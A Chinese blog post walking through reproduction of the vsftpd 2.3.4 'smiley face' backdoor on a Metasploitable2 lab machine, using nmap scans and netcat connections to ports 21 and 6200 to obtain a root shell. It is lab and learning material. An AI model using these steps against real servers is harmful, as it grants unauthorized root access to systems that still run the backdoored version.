笑脸漏洞的复现

最新推荐文章于 2023-07-12 15:49:34 发布
最新推荐文章于 2023-07-12 15:49:34 发布
阅读量1.8k 收藏
点赞数
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57511185/article/details/121904277
版权

vsftpd 2.3.4亦称为笑脸漏洞

1、漏洞背景

此漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有":) "(这大概就是此漏洞名字的来源),密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器,漏洞危害很大

2、实现过程

2.1打开Metasplotable2,在终端输入:ifconfig,查看其ip地址

2.2查看打开Metasplotable2 端口开放情况

输入:nmap 靶机IP

 2.3找到漏洞

输入:nmap -sV 靶机IP,其中21端口的vsftpd 2.3.4就是咱们要找的漏洞

 2.3输入用户名(必须带有:))和密码(随意),登录

输入:nc 靶机IP 21

2.4查看6200端口开放情况

在一个新的终端窗口输入:namp -p 6200 目标靶机的ip地址

 

image-20211102224657899

 2.5 连接靶机的6200端口

输入:nc 目标靶机ip 6200

 2.6查看自己的身份

输入:whoami

结果发现自己是管理员就意味着你无需密码亦可成功登入目标服务器。

 

枝上柳绵xys
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞是什么.txt
01-31
漏洞
常见漏洞加固方案
09-26
常见漏洞加固方案
VSFTP 2.3.4(笑脸漏洞)漏洞详解
m0_64593235的博客
04-18 1616
VSFTPD 2.3.4(笑脸漏洞)漏洞详解
vsftpd2.3.4笑脸漏洞
weixin_51909453的博客
11-02 4745
vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 1、靶机metasploitable2,默认登录账号和密码都是:msfadmin,登录成功后ifconfig查看靶机ip192.168.179.129 2、打开kali首先输入sudo su ,输入当前用户密码即可切换root,利用nmap -sV 192.168.
笑脸漏洞(VSFTP2.3.4)
dgjkkhcf的博客
07-24 4593
在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
VSFTPD v2.3.4 著名笑脸漏洞
aiwodouai的博客
12-14 2674
VSFTPD v2.3.4 著名笑脸漏洞
笑脸漏洞(VSFTPD2.3.4)
aarong的博客
11-01 7720
笑脸漏洞(VSFTPD2.3.4) 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
笑脸漏洞(vsftpd 2.3.4)
qq_52321992的博客
07-12 788
VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。“vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。
Linux(kali)笑脸漏洞实验
Selma003的博客
04-11 2068
笑脸漏洞实战感受
vsftpd 2.3.4 带漏洞版本 可
09-26
vsftpd 2.3.4 带笑脸漏洞版本 可
vulhub漏洞 CVE-2016-3088
最新发布
03-14
vulhub漏洞 CVE-2016-3088
笑脸漏洞
qq_62623325的博客
11-24 760
笑脸漏洞
笑脸漏洞的常规实
Radiency的博客
11-24 1734
笑脸漏洞 利用vsftpd-2.3.4远程控制目标主机
笑脸:)漏洞
xujing19920814的博客
10-01 226
笑脸漏洞
Ftp笑脸漏洞(后门漏洞
qq_55857040的博客
12-13 5055
目录 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞 实验环境: 实验准备 实验过程 小总结 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的...
内网渗透笔记——:)一个笑脸
wang_zui_zui的博客
03-01 5152
打靶机 靶机准备与安装---vulnhub-Metasploitable2-Linux Vulnerable By Design ~ VulnHubVulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.http://www.vulnhub.co
ToDesk漏洞
09-23
4. 漏洞:根据已知的漏洞信息和攻击技术,尝试在测试环境中重漏洞。这可能包括发送恶意数据、利用系统的弱点或执行其他攻击行为。 5. 分析结果:记录和分析攻击的效果和结果,包括成功获取敏感信息、绕过访问...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值